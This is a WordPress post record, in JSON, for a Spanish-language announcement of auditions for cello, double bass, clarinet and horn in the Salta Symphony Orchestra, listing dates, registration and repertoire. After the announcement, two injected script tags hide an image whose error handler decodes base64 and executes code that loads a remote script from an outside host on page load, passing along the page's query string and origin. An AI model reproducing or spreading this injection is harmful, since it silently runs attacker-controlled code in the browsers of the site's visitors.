{"id":4350,"date":"2024-08-26T10:15:50","date_gmt":"2024-08-26T13:15:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4350"},"modified":"2025-08-13T23:49:55","modified_gmt":"2025-08-14T02:49:55","slug":"audicion-publica-para-musicos-en-la-orquesta-sinfonica-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4350","title":{"rendered":"Audici\u00f3n P\u00fablica para M\u00fasicos en la Orquesta Sinf\u00f3nica de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-9abb21b0ccf22055752d298b82552057\" style=\"background-color:#82064a\"><em>La Orquesta Sinf\u00f3nica de Salta y el Instituto de M\u00fasica y Danza de la Provincia de Salta convocan a una audici\u00f3n para completar filas de violonchello, contrabajo, clarinete y trompa<\/em><\/h4>\n\n\n\n<p>La Orquesta Sinf\u00f3nica de Salta y el Instituto de M\u00fasica y Danza de la Provincia de Salta convocan a audici\u00f3n para completar filas de violonchello, contrabajo, clarinete y trompa.<\/p>\n\n\n\n<p>Los m\u00fasicos interesados en participar en esta audici\u00f3n deber\u00e1n presentar una nota formal dirigida al director titular de la Orquesta Sinf\u00f3nica de Salta,&nbsp;<strong>Jorge Uribe Gonz\u00e1lez<\/strong>. En la misma, deber\u00e1n solicitar la inscripci\u00f3n a la audici\u00f3n, adjuntar su curr\u00edculum vitae y mencionar la obra solista elegida para la interpretaci\u00f3n.<\/p>\n\n\n\n<p>La audici\u00f3n consistir\u00e1 en la interpretaci\u00f3n del primer movimiento de un concierto para instrumento solista y orquesta, solos orquestales, lectura a primera vista y una entrevista personal. Es importante destacar que el acompa\u00f1amiento de piano es opcional y que la orquesta no proveer\u00e1 un pianista acompa\u00f1ante.<\/p>\n\n\n\n<p>La apertura de inscripciones est\u00e1 prevista para hoy&nbsp;26 de agosto a las 08 hs el&nbsp;cierre el 30 de agosto a las 14 hs. Las entrevistas a los m\u00fasicos admitidos se realizar\u00e1n los d\u00edas 9 y 10 de septiembre de 2024 en el Teatro Provincial de Salta, ubicado en Zuvir\u00eda 70, Ciudad de Salta.<\/p>\n\n\n\n<p>Los interesados pueden obtener m\u00e1s informaci\u00f3n e inscribirse personalmente en la Casa de la Cultura, situada en Caseros N\u00ba 460, 2do piso, Ciudad de Salta, en el horario de 8:00 a 14:00 hs. Tambi\u00e9n est\u00e1 habilitada la inscripci\u00f3n v\u00eda correo electr\u00f3nico a la direcci\u00f3n oss.dptopersonal@gmail.com, aunque en este caso estar\u00e1 sujeta a la verificaci\u00f3n del cumplimiento de los requisitos exigidos.<\/p>\n\n\n\n<p><strong>ANEXO OBRAS A ELECCION<\/strong><\/p>\n\n\n\n<p>La obra solista elegida para la interpretaci\u00f3n por parte de los aspirantes se encuentran disponibles a continuaci\u00f3n ordenadas en funci\u00f3n del instrumento musical.<\/p>\n\n\n\n<p><strong>VIOLONCELLO<\/strong><\/p>\n\n\n\n<p>&nbsp;a) 1 (un) movimiento de un concierto con cadenza a elecci\u00f3n:<\/p>\n\n\n\n<p>&nbsp;b) Partes orquestales:<\/p>\n\n\n\n<p>&nbsp;b1) L.V. Beethoven. Sinfon\u00eda 5, 2do mov. . Da capo a a comp\u00e1s 10<\/p>\n\n\n\n<p>&nbsp;. Comp\u00e1s 49 a 59<\/p>\n\n\n\n<p>&nbsp;. Comp\u00e1s 98 a 106<\/p>\n\n\n\n<p>&nbsp;b2) J. Brahms. Sinfon\u00eda 2. 2do mov.<\/p>\n\n\n\n<p>&nbsp;. Da capo a comp\u00e1s 15<\/p>\n\n\n\n<p>&nbsp;b3) G. Verdi. R\u00e9quiem. 3er mov \u201cOfertorio\u201d<\/p>\n\n\n\n<p>&nbsp;. Da capo a letra B<\/p>\n\n\n\n<p>&nbsp;b4) P.I. Tchaikovsky. Sinfon\u00eda 6. 2do mov.<\/p>\n\n\n\n<p>&nbsp;. Da capo a comp\u00e1s 16<\/p>\n\n\n\n<p>&nbsp;b5) R. Strauss. Don Juan<\/p>\n\n\n\n<p>&nbsp;. Da capo a letra B<\/p>\n\n\n\n<p>&nbsp;b6) C. L\u00f3pez Buchardo. Poema Sinf\u00f3nico. D\u00eda de fiesta<\/p>\n\n\n\n<p>&nbsp;. Comp\u00e1s 120 a 128<\/p>\n\n\n\n<p>&nbsp;c) Lectura a primera vista<\/p>\n\n\n\n<p><strong>CONTRABAJO<\/strong><\/p>\n\n\n\n<p>&nbsp;a) 1 (un) movimiento de un concierto con cadenza a elecci\u00f3n:<\/p>\n\n\n\n<p>&nbsp;. Giovanni Bottesini: Concierto n\u00ba 2 para Contrabajo<\/p>\n\n\n\n<p>&nbsp;. Koussevitzky: Concierto para Contrabajo<\/p>\n\n\n\n<p>&nbsp;b) Partes orquestales<\/p>\n\n\n\n<p>&nbsp;b1) W.A. Mozart: Sinfon\u00eda No. 40<\/p>\n\n\n\n<p>&nbsp;b2) L.V. Beethoven. Sinfon\u00eda 5<\/p>\n\n\n\n<p>&nbsp;b3) G. Verdi. Otello. 4to acto<\/p>\n\n\n\n<p>&nbsp;b4) G. Mahler. Sinfon\u00eda 2<\/p>\n\n\n\n<p>&nbsp;b5) R. Strauss. Don Juan<\/p>\n\n\n\n<p>&nbsp;b6) Shostakovich, Sinfon\u00eda 5<\/p>\n\n\n\n<p>&nbsp;c) Lectura a primera vista<\/p>\n\n\n\n<p><strong>CLARINETE<\/strong><\/p>\n\n\n\n<p>a) W.A. Mozart Concierto para clarinete y orquesta en La mayor K.622 . Mov I<\/p>\n\n\n\n<p>b) Obra a elecci\u00f3n<\/p>\n\n\n\n<p>Solos orquestales:<\/p>\n\n\n\n<p>b1) D. Shostakovich: Sinfon\u00eda 9 Mov. III<\/p>\n\n\n\n<p>b2) L.V. Beethoven, Sinfon\u00eda 6. Mov I Desde compas 474 Hasta 492 \u2013 II Mov compas 68 a 783<\/p>\n\n\n\n<p>b3) H. Berlioz, Sinfon\u00eda Fant\u00e1stica- mov. V. Solo de Clarinete 2<\/p>\n\n\n\n<p>b4) F. Mendelsohn, Sue\u00f1o de una noche de verano- Scherzo- Clarinete 2 completo<\/p>\n\n\n\n<p>b5) N. Rimsky Korsakov, Capricho Espa\u00f1ol. Solos de I y II mov<\/p>\n\n\n\n<p>b6) G. Puccini. Tosca (Solo E lucevan le stelle)<\/p>\n\n\n\n<p>c) Lectura a primera vista<\/p>\n\n\n\n<p><strong>TROMPA<\/strong><\/p>\n\n\n\n<p>&nbsp;a) W.A. Mozart. Concierto para trompa n.\u00ba 4 en mi bemol mayor, K. 495. Mov I con cadenza<\/p>\n\n\n\n<p>&nbsp;b) Solos orquestales:<\/p>\n\n\n\n<p>&nbsp;b1) Strauss. Till Eulenspiegels.S\u00f3lo de Corno III<\/p>\n\n\n\n<p>&nbsp;b2) P. I Tchaikovsky, Sinfon\u00eda 5, 2do. mov. Corno I.<\/p>\n\n\n\n<p>&nbsp;b3) L.V. Beethoven, Sinfon\u00eda Nro. 7, 1er. mov. solo de Corno I<\/p>\n\n\n\n<p>&nbsp;b4) R. Strauss, Don Juan, solos del corno 1<\/p>\n\n\n\n<p>&nbsp;b5) F. Mendelssohn \u2013 Sinfon\u00eda N\u00ba 3 \/ 3rd Corno Solo<\/p>\n\n\n\n<p>&nbsp;c) Lectura a primera vista<\/p>\n\n\n\n<p>ENLACE DE PARTITURAS DE LAS OBRAS SELECCIONADAS:&nbsp;&nbsp;<a href=\"https:\/\/drive.google.com\/drive\/folders\/1nL9MYGlSgARqEy7cKIb3oZpj5CVhsjex\">https:\/\/drive.google.com\/drive\/folders\/1nL9MYGlSgARqEy7cKIb3oZpj5CVhsjex<\/a><br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Orquesta Sinf\u00f3nica de Salta y el Instituto de M\u00fasica y Danza de la Provincia de Salta convocan a una audici\u00f3n para completar filas de violonchello, contrabajo, clarinete y trompa La Orquesta Sinf\u00f3nica de Salta y el Instituto de M\u00fasica y Danza de la Provincia de Salta convocan a audici\u00f3n para completar filas de violonchello, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4351,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-4350","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4350"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4350"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4350\/revisions"}],"predecessor-version":[{"id":6700,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4350\/revisions\/6700"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4351"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}